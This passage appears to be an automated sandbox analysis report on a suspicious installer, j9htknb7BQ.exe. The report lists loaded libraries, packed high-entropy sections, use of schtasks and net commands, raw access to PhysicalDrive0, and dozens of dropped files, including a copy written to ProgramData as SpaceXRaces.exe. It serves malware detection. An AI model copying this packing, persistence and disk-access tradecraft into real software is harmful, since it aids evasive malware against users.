Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: appxsip.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: opcservices.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: appxsip.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: opcservices.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: j9htknb7BQ.exe | Static file information: File size 7246011 > 1048576
Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-U01MD.tmp.1.dr
Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-MGR1O.tmp.1.dr

Data Obfuscation

                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                  Source: crtgame.exe.1.drStatic PE information: section name: .hsave
                  Source: is-2DM26.tmp.1.drStatic PE information: section name: /4
                  Source: is-QASVM.tmp.1.drStatic PE information: section name: /4
                  Source: is-R3MEC.tmp.1.drStatic PE information: section name: /4
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /4
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /19
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /31
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /45
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /57
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /70
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /81
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /92
                  Source: is-MGR1O.tmp.1.drStatic PE information: section name: .trace
                  Source: is-MGR1O.tmp.1.drStatic PE information: section name: _RDATA
                  Source: is-MGR1O.tmp.1.drStatic PE information: section name: .debug_o
                  Source: is-89IOF.tmp.1.drStatic PE information: section name: /4
                  Source: is-O2JHA.tmp.1.drStatic PE information: section name: /4
                  Source: is-PC991.tmp.1.drStatic PE information: section name: /4
                  Source: is-15SLJ.tmp.1.drStatic PE information: section name: /4
                  Source: is-NTP22.tmp.1.drStatic PE information: section name: /4
                  Source: is-6AF6U.tmp.1.drStatic PE information: section name: /4
                  Source: is-I69V3.tmp.1.drStatic PE information: section name: /4
                  Source: is-4L1QL.tmp.1.drStatic PE information: section name: /4
                  Source: is-9BPGE.tmp.1.drStatic PE information: section name: /4
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name: petite
                  Source: is-4DA3B.tmp.1.drStatic PE information: section name: /4
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name: petite
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name: petite
                  Source: is-KJFHV.tmp.1.drStatic PE information: section name:
                  Source: is-KJFHV.tmp.1.drStatic PE information: section name: petite
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name: petite
                  Source: is-INJF5.tmp.1.drStatic PE information: section name: /4
                  Source: is-8KTA3.tmp.1.drStatic PE information: section name: .sxdata
                  Source: is-53LMN.tmp.1.drStatic PE information: section name: .didata
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name: petite
                  Source: is-Q99K1.tmp.1.drStatic PE information: section name:
                  Source: is-Q99K1.tmp.1.drStatic PE information: section name: petite
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name: petite
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name: petite
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name: petite
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name: petite
                  Source: is-LKN3T.tmp.1.drStatic PE information: section name: /4
                  Source: is-M9NVL.tmp.1.drStatic PE information: section name: /4
                  Source: is-NFQ3O.tmp.1.drStatic PE information: section name: /4
                  Source: is-0H0B1.tmp.1.drStatic PE information: section name: /4
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-TN6ID.tmp.1.drStatic PE information: section name: /4
                  Source: is-RRVDV.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-15Q83.tmp.1.drStatic PE information: section name: asmcode
                  Source: is-N90RR.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-LCCKT.tmp.1.drStatic PE information: section name: /4
                  Source: is-US51G.tmp.1.drStatic PE information: section name: /4
                  Source: is-DSQCO.tmp.1.drStatic PE information: section name: /4
                  Source: SpaceXRaces.exe.5.drStatic PE information: section name: .hsave
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx1_2_004765B1
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx -- 1_2_004106E5
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00412938 push 0041299Bh; ret -- 1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004589F0 push 00458A34h; ret -- 1_2_00458A2C
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx -- 1_2_00442C98
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00450E58 push 00450E8Bh; ret -- 1_2_00450E83
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0045101C push ecx; mov dword ptr [esp], eax -- 1_2_00451021
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx -- 1_2_0040D03A
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx -- 1_2_00493111
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004571B0 push 004571E8h; ret -- 1_2_004571E0
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx -- 1_2_0045F448
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0040546D push eax; ret -- 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0040553D push 00405749h; ret -- 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx -- 1_2_0040F59A
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004055BE push 00405749h; ret -- 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0040563B push 00405749h; ret -- 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004056A0 push 00405749h; ret -- 1_2_00405741
Source: crtgame.exe.1.dr -- Static PE information: section name: .text entropy: 7.600836004242041
Source: is-PE6Q4.tmp.1.dr -- Static PE information: section name: entropy: 7.953893773659523
Source: is-1GFJF.tmp.1.dr -- Static PE information: section name: entropy: 7.921519965168042
Source: is-RV1NR.tmp.1.dr -- Static PE information: section name: entropy: 7.966771808365004
Source: is-7M8GD.tmp.1.dr -- Static PE information: section name: entropy: 7.950928332152424
Source: is-R3T6A.tmp.1.dr -- Static PE information: section name: entropy: 7.491817342209834
Source: SpaceXRaces.exe.5.dr -- Static PE information: section name: .text entropy: 7.600836004242041

Persistence and Installation Behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 -- 5_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 -- 7_2_02BCF29C
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-15Q83.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-U01MD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-MGR1O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-LCCKT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2DM26.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-INJF5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-0B8UA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-R3T6A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4DA3B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-R3MEC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-6AF6U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-NTP22.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-QASVM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-4L1QL.tmp
Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- File created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exe
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RV1NR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PC991.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-1L7JU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-LKN3T.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-TN6ID.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-J4G02.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-1GFJF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-7M8GD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-V1IHP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RRVDV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-53LMN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-Q99K1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-O2JHA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-I69V3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-KJFHV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\crtgame.exe
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_shfoldr.dll
